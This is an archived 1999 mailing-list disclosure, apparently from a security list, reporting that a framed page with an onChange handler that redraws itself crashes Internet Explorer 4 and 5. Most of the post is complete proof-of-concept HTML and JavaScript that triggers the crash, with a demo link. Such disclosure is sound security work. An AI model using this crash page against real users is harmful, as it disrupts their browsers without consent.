Crash IE 4/5

From: Thomas Reinke (reinke@E-SOFTINC.COM)
Date: Tue Sep 14 1999 - 10:42:52 PDT

    It is possible to crash IE4/5 using a bit of dynamic HTML.
    The specifics of the setup are as follows:
    
    A page uses frames to host JavaScript code on the main page,
    and uses a "main" subframe to display rendered contents calculated
    by the JavaScript code. In addition, the displayed page has
    event handlers on various actions that could be cause for
    the page to be redrawn, by executing a function in the
    parent frame.
    
    So, if we use an "onChange" event handler in a text input
    box, and the user enters data and TABS out of the box,
    the onChange event handler is invoked. If the event handler
    redraws the page, IE will crash. Note that if you change
    the data and then CLICK on the page, the event handler
    is also invoked, the page is redrawn, but the browser
    does not crash.
    
    A working version of the bug can be found at
    http://www.e-softinc.com/iebug_001.html
    
    A copy of the HTML code is shown below. The bug has
    been tested to work on Windows NT IE 5.00.2314.1003,
    and Windows 95 IE 4.72.3110.8.
    
    Cheers, Thomas
    -------------------------------------------------------------------------
    <HTML>
    <HEAD>
    <SCRIPT LANGUAGE="JavaScript">
    <!--
    
    function blank() {
      return "<HTML></HTML>"
    }
    
    function blank2() {
      return "<HTML><BODY onload='parent.paintme()'></BODY></HTML>"
    }
    
    function paintme() {
       main.document.write(rewrite());
       main.document.close();
    }
    
    function rewrite() {
    var ns = '<HTML> \r\n\
    <HEAD> \r\n\
    <title>Buy Investments</title> \r\n\
    </HEAD> \r\n\
    <BODY>\r\n\
    To crash your browser (if you are running IE), enter a value in the\r\n\
    first field and press <TAB> (which would normally move you to the\r\n\
    second field).\r\n\
    <P>\r\n\
    <FORM name=dummy>\r\n\
    <TABLE>\r\n\
        <TR>\r\n\
            <TD align=right>A text field</td>\r\n\
            <TD><INPUT TYPE=text name=number onChange="parent.paintme()"></td>\r\n\
        </TR>\r\n\
        <TR>\r\n\
            <TD align=right>A dummy field we want to tab to:</td>\r\n\
            <TD><INPUT TYPE=text name=number2></td>\r\n\
        </TR>\r\n\
    </table>\r\n\
    </FORM>\r\n\
    </BODY>\r\n\
    </HTML>'
    
    return ns
    }
    //-->
    </SCRIPT>
    </HEAD>
    <FRAMESET ROWS="1,*" FRAMEBORDER=0 FRAMESPACING=0>
        <FRAME NAME="blank" SCROLLING=NO SRC="javascript:parent.blank()">
        <FRAME NAME="main" SRC="javascript:parent.blank2()">
    </FRAMESET>
    </HTML>
    ------------------------------------------------------------
    Thomas Reinke                            Tel: (416) 460-7021
    Director of Technology                   Fax: (416) 598-2319
    E-Soft Inc.                         http://www.e-softinc.com
    



    This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:03:49 PDT